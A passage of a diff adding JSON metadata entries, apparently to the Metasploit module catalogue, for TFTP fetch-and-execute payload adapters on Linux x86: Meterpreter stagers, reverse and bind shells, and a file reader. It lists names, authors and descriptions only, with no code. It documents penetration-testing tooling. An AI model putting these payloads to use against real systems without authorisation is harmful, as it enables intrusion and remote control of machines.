"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/find_tag", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/x86/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/x86/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/metsvc_bind_tcp": { + "name": "TFTP Fetch, Linux Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/linux/tftp/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/metsvc_reverse_tcp": { + "name": "TFTP Fetch, Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/read_file": { + "name": "TFTP Fetch, Linux Read File", + "fullname": "payload/cmd/linux/tftp/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hal" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/read_file", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/shell/bind_nonx_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/bind_tcp_uuid": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/shell/find_tag": { + "name": "TFTP Fetch, Linux Command Shell, Find Tag Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/find_tag", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_ipv6_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_nonx_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_tcp_uuid": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/shell_bind_ipv6_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_bind_tcp_random_port": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_find_port": { + "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_find_port", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_find_tag": { + "name": "TFTP Fetch, Linux Command Shell, Find Tag Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_find_tag", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle ", + "joev " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_reverse_tcp_ipv6": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Matteo Malvica " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + 